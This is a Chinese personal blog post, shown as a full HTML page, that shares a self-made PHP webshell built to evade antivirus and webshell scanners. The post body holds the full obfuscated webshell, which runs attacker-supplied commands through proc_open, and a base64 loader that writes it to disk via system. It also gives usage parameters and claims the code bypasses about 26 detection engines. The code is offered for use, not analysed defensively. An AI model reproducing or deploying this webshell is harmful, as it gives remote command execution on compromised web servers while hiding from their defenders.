
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>php webshell免杀初探 - glan&#39;s blog</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="glan Obsidian hack 网安 ctf,"> 
    <meta name="description" content="ctf 个人博客 glan blog hack the world 个人成长日记,
前段时间上班无聊，刷公众号偶然发现一篇“原神免杀”的文章，突然来了兴趣研究研究，找了曾哥的webshell免杀手册来看。自己做了几个样本，效果测试还不错，就放出来和大家交流，感觉基本够用。

截止,"> 
    <meta name="author" content="glan"> 
    <link rel="alternative" href="atom.xml" title="glan&#39;s blog" type="application/atom+xml"> 
    <link rel="icon" href="/img/tou.png"> 
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

    
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css">

    
    <script>var musiclist = "2878145241"</script>
    
<script src="/js/loadaplayer.js"></script>

    <!-- 引用依赖 -->
    
<link rel="stylesheet" href="/aplayer/dist/APlayer.min.css">

    
<script src="/aplayer/dist/APlayer.min.js"></script>
<script src="/js/Meting.min.js"></script>

    
<meta name="generator" content="Hexo 6.3.0"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">glan&#39;s blog</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/tou.png" alt="" data-url="https://g1an123.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">php webshell免杀初探</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url('/img/cover.jpg') ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="javascript:;"><b>「 </b>文章<b> 」</b></a>
                
                二月 06, 2024
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2024/02/06/php%20webshell%E5%85%8D%E6%9D%80%E5%88%9D%E6%8E%A2/" title="php webshell免杀初探" class="">php webshell免杀初探</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>文章字数</i>
                    5k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>阅读约需</i>
                    5 mins.
                </span>
                
                
                <span id="/2024/02/06/php webshell免杀初探/" class="leancloud_visitors" data-flag-title="php webshell免杀初探">
                    <b class="iconfont icon-read"></b> <i>阅读次数</i>
                    <span class="leancloud-visitors-count">1000000</span>
                </span>
                
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/webshell%E5%85%8D%E6%9D%80/" rel="tag">webshell免杀</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/%E5%85%A5%E9%97%A8/" rel="tag">入门</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <blockquote>
<p>前段时间上班无聊，刷公众号偶然发现一篇“<a href=https://github.com/icewolf-sec/PerlinPuzzle-Webshell-PHP>原神免杀</a>”的文章，突然来了兴趣研究研究，找了曾哥的<a href=https://blog.zgsec.cn/archives/197.html>webshell免杀手册</a>来看。自己做了几个样本，效果测试还不错，就放出来和大家交流，感觉基本够用。</p>
</blockquote>
<p>截止2月6日</p>
<h3 id="免杀效果："><a href="#免杀效果：" class="headerlink" title="免杀效果："></a>免杀效果：</h3><p><strong>免杀成功</strong>：绕过成功：阿里伏魔引擎、安恒云沙箱、河马WebShell查杀、魔盾云沙箱、微步集成引擎共26个（微软、卡巴斯基、IKARUS、Avast、GDATA、安天、360、NANO、瑞星、Sophos、WebShell专杀、MicroAPT、OneStatic、ESET、小红伞、大蜘蛛、AVG、K7、江民、Baidu、TrustBook、熊猫、ClamAV、Baidu-China、OneAV、MicroNonPE）、D盾、Windows Defender、火绒安全软件</p>
<p><strong>免杀失败</strong>：长亭百川WebShell查杀引擎<br><strong>解决方案</strong>：通过webshell加载器进行绕过，实战中不知道是否可行。（可能要加入不死马机制？）</p>
<p>本体.php</p>
<pre><code class="php">  
&lt;?php  
function GMigF()&#123;  
    return chr(1078/11)/* qChxU h JsC*/.chr(970/10).chr(1725/15).chr(1616/16).chr(270/5).chr(520/10).chr(665/7).chr(1100/11).chr(1414/14).chr(1485/15).chr(1554/14).chr(600/6).chr(1515/15);  
&#125;  
$tkhSr = GMigF();  
  
function test()&#123;  
    return extract($_GET);  
&#125;  
  
  
class Gw0O6U55 &#123;  
    public $dKd;  
    public function __construct($H5Hm8)&#123;  
        $this-&gt;dKd=&quot;/*Z871A24vf4*/&quot;.$H5Hm8.&quot;/*Z871A24vf4*/&quot;;  
    &#125;  
&#125;  
  
if (test())&#123;  
    $auPtVEeJgC=new Gw0O6U55($_REQUEST[$tkhSr(&#39;MQ==&#39;)]);  
    $LPMeYBR=substr($auPtVEeJgC -&gt;dKd,14,-14);  
&#125;  
  
  
$VEIlAcb =[  
    0 =&gt; [$tkhSr(&#39;cGlwZQ==&#39;), $tkhSr(&#39;cg==&#39;)],  
    1 =&gt; [$tkhSr(&#39;cGlwZQ==&#39;), $tkhSr(&#39;dw==&#39;)],  
    2 =&gt; [$tkhSr(&#39;cGlwZQ==&#39;), $tkhSr(&#39;dw==&#39;)],  
];  
  
$qwVrFISA = proc_open($LPMeYBR, $VEIlAcb,$pipes);  
  
if (is_resource($qwVrFISA))&#123;  
    $shqeo = stream_get_contents($pipes[1]);  
  
    fclose($pipes[0]);  
    fclose($pipes[1]);  
    fclose($pipes[2]);  
    proc_close($qwVrFISA);  
  
    echo $shqeo;  
&#125;
</code></pre>
<p>加载器</p>
<pre><code class="php">&lt;?php  
$hahaha = strtr(&quot;abatme&quot;,&quot;me&quot;,&quot;em&quot;);  
$wahaha = strtr($hahaha,&quot;ab&quot;,&quot;sy&quot;);  
$gogogo = strtr(&#39;echo &quot;Cjw/cGhwCmZ1bmN0aW9uIEdNaWdGKCl7CiAgICByZXR1cm4gY2hyKDEwNzgvMTEpLyogcUNoeFUgaCBKc0MqLy5jaHIoOTcwLzEwKS5jaHIoMTcyNS8xNSkuY2hyKDE2MTYvMTYpLmNocigyNzAvNSkuY2hyKDUyMC8xMCkuY2hyKDY2NS83KS5jaHIoMTEwMC8xMSkuY2hyKDE0MTQvMTQpLmNocigxNDg1LzE1KS5jaHIoMTU1NC8xNCkuY2hyKDYwMC82KS5jaHIoMTUxNS8xNSk7Cn0KJHRraFNyID0gR01pZ0YoKTsKCmZ1bmN0aW9uIHRlc3QoKXsKICAgIHJldHVybiBleHRyYWN0KCRfR0VUKTsKfQoKCmNsYXNzIEd3ME82VTU1IHsKICAgIHB1YmxpYyAkZEtkOwogICAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRINUhtOCl7CiAgICAgICAgJHRoaXMtPmRLZD0iLypaODcxQTI0dmY0Ki8iLiRINUhtOC4iLypaODcxQTI0dmY0Ki8iOwogICAgfQp9CgppZiAodGVzdCgpKXsKICAgICRhdVB0VkVlSmdDPW5ldyBHdzBPNlU1NSgkX1JFUVVFU1RbJHRraFNyKCdNUT09JyldKTsKICAgICRMUE1lWUJSPXN1YnN0cigkYXVQdFZFZUpnQyAtPmRLZCwxNCwtMTQpOwp9CgoKJFZFSWxBY2IgPVsKICAgIDAgPT4gWyR0a2hTcignY0dsd1pRPT0nKSwgJHRraFNyKCdjZz09JyldLAogICAgMSA9PiBbJHRraFNyKCdjR2x3WlE9PScpLCAkdGtoU3IoJ2R3PT0nKV0sCiAgICAyID0+IFskdGtoU3IoJ2NHbHdaUT09JyksICR0a2hTcignZHc9PScpXSwKXTsKCiRxd1ZyRklTQSA9IHByb2Nfb3BlbigkTFBNZVlCUiwgJFZFSWxBY2IsJHBpcGVzKTsKCmlmIChpc19yZXNvdXJjZSgkcXdWckZJU0EpKXsKICAgICRzaHFlbyA9IHN0cmVhbV9nZXRfY29udGVudHMoJHBpcGVzWzFdKTsKCiAgICBmY2xvc2UoJHBpcGVzWzBdKTsKICAgIGZjbG9zZSgkcGlwZXNbMV0pOwogICAgZmNsb3NlKCRwaXBlc1syXSk7CiAgICBwcm9jX2Nsb3NlKCRxd1ZyRklTQSk7CgogICAgZWNobyAkc2hxZW87Cn0K&quot; |base64 -d &gt; ./out2.php&#39;,&quot;&quot;,&quot;&quot;);  
$wahaha($gogogo);
</code></pre>
<h3 id="如何使用："><a href="#如何使用：" class="headerlink" title="如何使用："></a>如何使用：</h3><ol>
<li><p>直接上传本体：<br><code>?c=1&amp;1=&#123;cmd&#125;</code><br>如：<br><code>?c=1&amp;1=ls</code></p>
</li>
<li><p>使用加载器:<br>访问加载器后webshell地址在同级目录下的<code>out2.php</code><br>传参和上文一致。</p>
</li>
</ol>
<p>免杀绕过截图放在下面：</p>
<p><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233651.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233652.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233653.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233655.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233656.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233657.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233658.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233659.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233660.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233661.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233662.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233663.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233664.png"><br><img src="https://cdn.jsdelivr.net/gh/g1an123/blogimage@main/202402062233665.png"></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
                        
            
            
            <div id="vcomments"></div>
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="/img/tou.png" height=300 width=300></img>
                    <p>glan</p>
                    <span>心有山水不造作，近而不争远是非，且停且望且随风，且行且看且从容。</span>
                    <dl>
                        
                            
                                <dd><a href="https://github.com/g1an123" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                            
                            
                                <dd><a href="#不给" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                            
                            
                                <dd><a href="#没有" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                            
                        
                        
                    </dl>
                </div>
                <ul>
                    <li><a href="/">19 <p>文章</p></a></li>
                    <li><a href="/categories">8 <p>分类</p></a></li>
                    <li><a href="/tags">18 <p>标签</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>目录</h4>
                    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%8D%E6%9D%80%E6%95%88%E6%9E%9C%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">免杀效果：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">如何使用：</span></a></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2024
        <span class="gradient-text">
            glan
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.9.4" target="_blank" rel="noopener">v1.4.9.4</a></small>
        
        </br>
        
        <span class="gradient-text">
            <a href="https://beian.miit.gov.cn/" title="beian.miit.gov.cn" target="_blank" rel="noopener">beian.miit.gov.cn</a>
        </span>
        
        
        </br>
        <span style="display: inline-block;"> <img src=https://beian.miit.gov.cn/favicon.ico></span>
        
        <span class="gradient-text">
            <a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44010602009049" title="www.beian.gov.cn&#x2F;portal&#x2F;registerSystemInfo?recordcode&#x3D;44010602009049" target="_blank" rel="noopener">www.beian.gov.cn&#x2F;portal&#x2F;registerSystemInfo?recordcode&#x3D;44010602009049</a>
        </span>
        
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>


 
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
 
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
 
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
 
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>
 
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>
   
<script src="/js/busuanzi.min.js"></script>

<script>
  $(document).ready(function () {
    if ($('span[id^="busuanzi_"]').length) {
      initialBusuanzi();
    }
  });
</script>
 
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>
  

<script>
  function initialTyped() {
    var typedTextEl = $('.typed-text');
    if (typedTextEl && typedTextEl.length > 0) {
      var typed = new Typed('.typed-text', {
        strings: ['心有山水不造作，近而不争远是非，且停且望且随风，且行且看且从容。', '不念过往，不畏将来。'],
        typeSpeed: 90,
        loop: true,
        loopCount: Infinity,
        backSpeed: 20,
      });
    }
  }

  if ($('.article-header') && $('.article-header').length) {
    $(document).ready(function () {
      initialTyped();
    });
  }
</script>

 
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var valine = new Valine();

  function initValine(path) {
    if (!path) path = window.location.pathname;
    let language = 'zh-CN';
    if (!language) {
      language = 'en';
    } else {
      language = language.toLowerCase();
    }
    valine.init({
      el: '#vcomments',
      appId: 'bhLS1VLSliBdb17Nb2GWIiGv-gzGzoHsz',
      appKey: 'evXh0IqqkwxvSecXotjoPd3G',
      notify: 'false',
      verify: 'false',
      avatar: 'wavatar',
      placeholder: 'Leave your throughs behind~',
      visitor: 'true',
      path: path,
      lang: language,
    });
  }

  $(document).ready(function () {
    initValine();
  });
</script>



<!-- 引用依赖 -->
<script>document.write(aplayerconf)</script>




</html>
